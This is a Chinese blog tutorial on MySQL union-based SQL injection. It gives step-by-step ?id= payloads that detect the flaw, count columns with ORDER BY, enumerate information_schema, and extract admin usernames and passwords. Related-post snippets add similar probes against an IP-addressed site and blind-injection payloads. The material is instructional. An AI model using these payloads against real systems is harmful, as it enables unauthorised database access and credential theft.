mysql数据库sql注入原理_SQL注入原理解析以及举例1

最新推荐文章于 2021-02-02 14:10:25 发布
最新推荐文章于 2021-02-02 14:10:25 发布
阅读量278 收藏 1
点赞数
文章标签: mysql数据库sql注入原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32868705/article/details/113456149
版权

sql注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作。

sql注入漏洞产生满足条件:

1;用户能够控制数据的输入。

2;原本需要执行的代码,拼接了用户的输入。

举例:

攻击流程:

1;判断是否存在sql注入漏洞。

2;判断网页存在字段数。

3;判断回显点。

4;获取信息。

测试开始:

测试目标获取管理员账号密码

一;判断是否存在sql注入漏洞。

1.1;构建sql语句:?id=1 and 1=2 查看页面是否正常。结果页面显示不正常。

31f3828239a9d0993f4fd4e72fe0c3b9.png

注释:因为id=1为真(可正常访问页面),且1=2为假,所以and条件永远不会成立。对于web应用不会返回结果给用户。则攻击者能看到的是一个错误的界面或者页面结果为空。当然,如果攻击者构造的请求异常,也会导致页面访问不正常。

7b50c8a7ce689d14af7435635486c4d5.png

1.2;构建新的sql语句,确定是否存在语句逻辑错误导致页面不正常。?id=1 and 1=1 结果页面正常,初步判断存在sql漏洞。

注释:1=1 为真,and条件语句成立。

8207ff224cbd203f70535e208d04b043.png

二;判断字段数:

2.1;构建sql语句:?id=1 and 1=1 order by 1 判断网页是否正常。?id=1 and 1=1 order by 2 判断网页是否正常。?id=1 and 1=1 order by 3 判断网页是否正常。结果:?id=1 and 1=1 order by 3 网页显示不正常,可以判断字段数为2

注释:order by 语句用来根据指定的列对结果集进行排序。详细请参考网址:http://www.w3school.com.cn/sql/sql_orderby.asp “order by 1”表示对第一栏位进行排序,

三;判断回显点:构建sql语句:?id=1 and 1=2 union select 1,2 (之后的查询结果将显示在下图红框位置)

注释:union 操作符用于合并两个或多个select语句的结果集,union内部的select语句必须拥有相同数量的列。详细参考:http://www.w3school.com.cn/sql/sql_union.asp

a1f25ef70090a8c9b20ced12af824dd2.png

四; 获取信息

4.1;查看当前数据库名以及数据库版本。构建sql语句:?id=1 and 1=2 union select 1,database();?id=1 and 1=2 unio select 1, version()

注释:union select 1 ,database(),其中数字1占一列,凑数,用来满足union定义。database():表示网站使用的数据库,version():表示当前mysql的版本,usr():当前mysql的用户。

9ef26559b5712c6ef18cbdd4c7ec0bff.png

2b9966ddd09167856aacd945ffaa2f96.png

4.2;查询当前数据库以及表名称。构建sql语句:?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

注释:information_schema数据库用于存储数据库元数据,例如:数据库名,表名,列的数据类型,访问权限等。tables用来存储数据库中的表的信息,包括表属于哪个数据库,表的类型,存储引擎,创建时间等。table_schema和table_schema是表tables中的数据库库名和表名。limit 0,1 表示第一行显示一行数据。limit 1,1表示第二行显示一行数据。

212cc691186c2cb30c5213aa7cad9a5f.png

4.3;查询表admin中的字段名。查询三个字段:ID username  password

构建SQL语句:?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

构建SQL语句:?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1

构建SQL语句:?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1

注释:columns表存储表中的列的信息。其中包含数据库库名table_schema,表名table_name ,字段名column_name。

4.4;查询用户名称:?id=1 and 1=2 union select 1,username from admin

ec5d104fa26e3b7d7229c357fa8881ab.png

4.5;查询密码:?id=1 and 1=2 union select 1,password from admin

c18b92517cb8039ff6de189cab645b0a.png

谈棉花
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sql注入详解(原理篇)
Naive的博客
09-11 9171
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL学习笔记1
weixin_34293141的博客
07-23 3362
* 以下内容是我在学习SQL(http://www.w3school.com.cn/sql/index.asp)的时候的学习笔记 * 学习时使用的数据库软件是MySQL数据库可视化工具SQLyogEnt * 如果大家有发现什么不对的地方请告诉我。谢啦!!☆⌒(*^-゜)v * 在这里需要注意的是,和SqlServer相比MySQL不支持事务处理,没有视图,没有存储过程和触发器,没有数...
SQL注入 (1)
qq_39527920的博客
08-12 1215
第一步:测试是否存在注入点,用and语句测试。 http://120.203.13.75:6815/?id=1 and 1=1  http://120.203.13.75:6815/?id=1 and 1=2 一网址可以正常显示,二网址则无法显示,所以推断有注入点。 第二步:猜测字段 http://120.203.13.75:6815/?id=1 order by 2 http:...
sql注入之联合查询(Mysql
华丽的贵族
09-05 1233
联合注入 - 测试网站 phpstudy搭建的mysql网站 http://localhost/pentest/article.php?id=1 - 注入步骤 1.判断是否存在注入 输入and 1=1 未报错 输入and 1=2 报错 2.获取字段的总数: order by +数字 数字从1到4时4报错,所以网站字段为3 3.进行连接查询 http://localhost/pentest...
CTF系列之Web——联合查询注入
洛柒尘的博客
06-27 3217
前言 在刚学习SQL注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的SQL注入知识点。 学习web系列推荐先学习MySQL、H
MySQL使用mysqldump+binlog完整恢复被删除的数据库原理解析
12-14
举例来说,假设在4月1日晚上8:00做了全备,4月2日中午12:00时发生了误删除数据库的情况。全备可以将数据库恢复到4月1日晚上8:00,而4月1日8:00之后至4月2日12:00之间的所有变更则需通过解析二进制日志来重做。 (三...
mysql 数据库中索引原理分析说明
12-15
下面,我们举例来说明一下聚集索引和非聚集索引的区别:其实,我们的汉语字典的正文本身就是一个聚集索引。比如,我们要查“安”字,就会很自然地翻开字典的前几页,因为“安”的拼音是“an”,而按照拼音排序汉字的...
SQL-of-add.zip_sql_数据库vi
09-23
这通常涉及到使用LabVIEW的数据库接口功能,以便与各种类型的关系型数据库(如MySQLSQL Server、Oracle等)进行交互。 描述中提到,“封装好的子VI可通过SQL实现对数据的添加,从而建立labview与数据库的连接”。...
sql.rar_jsp JDBC数据库 删除
09-19
而JDBC则是Java中用于访问数据库的标准接口,它提供了一组API,允许开发者连接到各种关系型数据库,执行SQL语句,以及管理数据库连接。 当我们需要在JSP中实现数据库的删除操作时,通常遵循以下步骤: 1. **建立...
数据库智能网关-PLC寄存器配置与其自动生成的SQL语句对应
最新发布
05-23
网关支持MySQLSQLServer、PostgreSQL,以及Oracle等。 智能网关支持周期、触发等多种工作模式,带有专门的参数配置软件,通过所配置的参数自动生成SQL 命令语句,配置与所生成的SQL 命令语句的对应关系参考以下...
凑数器-随机求和等于指定数.zip_excel凑数在哪里
01-01
凑数器-随机求和等于指定数,发票凑数器,生成随机数等等,可指定生成随机数个数,上限,下限,小数点等等
MYSQL注入总结
qq_39654116的博客
01-04 427
总结 联合注入的优势是自带多个显位,可以很快爆出数据,缺点是只能用在select最后处,后面如果还有sql语句就必须注释掉。而且必须用到union和select,很容易被拦截。 特定变量 常用变量 1. SCHEMATA表 : 提供了当前mysql实例中所有数据库的信息。 2. TABLES 表 : 提供了关于数据库中的表的信息。 3. COLUMNS 表 :提供了表中的列信息 select … union select … SELECT Company, OrderNumber FROM Orders O
mysql注入逐字猜解_MYSQL注入天书(Sqli-labs)学习笔记(二)
weixin_33382711的博客
02-02 250
Less-51.使用left()函数盲注首先得到数据库长度id=1’ and length(database())=8–+猜解第一个字符:id=1’ and left(database(),1)>‘a’–+可以采用二分法提高效率,得到第一个字符为s第二位字符:id=1’ and left(database(),2)>‘sa’–+以此类推可得到完整数据库名2.使用substr(),asc...
mysql -- 手工注入
Nixawk
04-22 6457
------------------[index1.php源码]------------------ ID: ------------------[index2.php源码]------------------ $con = mysql_connect("localhost","root","fuckyou"); mysql_select_db("mytestdb"
SQL注入Mysql注入原理
afei001
05-03 660
Mysql函数 1.system_user() #系统用户名; 2.user() #用户名; 3.current_user #当前用户名; 4.session_user() #连接数据库的用户名; 5.database() #数据库名; 6.version() ...
mysql注入原理_Mysql报错注入原理分析
weixin_33756596的博客
01-19 431
报错类型Duplicate entry报错:多次查询插入重复键值导致count报错从而在报错信息中带入了敏感信息。Xpath报错:从mysql5.1.5开始提供两个XML查询和修改的函数,语法错误导致查询结果出现在报错信息里数据溢出报错:整形溢出,双精度溢出数据重复报错:列名重复其余报错(几何函数)基于count(),rand(),group by()的报错注入原理分析[转]利用Duplicate...
凑数
成长之路
03-21 1367
给出一个数组,比如{1,3,6,9,13,8},如果其中两个数的和是14,则将这两个数删除,输出剩下的数字。 #include #include #define SUM 14 int comp ( const void *a, const void *b ) { return * ( int * ) a - * ( int * ) b; } int main() { int
mysql数据库sql注入原理_如何SQL注入原理SQL注入的基础
weixin_36124208的博客
01-28 279
SQL注入的基础介绍SQL注入SQL注入就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带人数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。一般情况下,开发人员可以使用动态SQL语句创建用、灵活的应用。动态SQL语句是在执行过程中构造的,它根据不同的条件产生不同的SQL语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什...
SQL注入漏洞详解
墨痕诉清风的博客
08-09 9347
" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。
为什么参数化查询可以防止sql注入,请举例说明
05-29
参数化查询是一种使用占位符代替实际的用户输入数据的查询方式,它将用户输入数据与查询语句分开处理,从而避免了 SQL 注入攻击。在参数化查询中,占位符的值由应用程序动态生成,而不是从用户输入中获取。这样,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值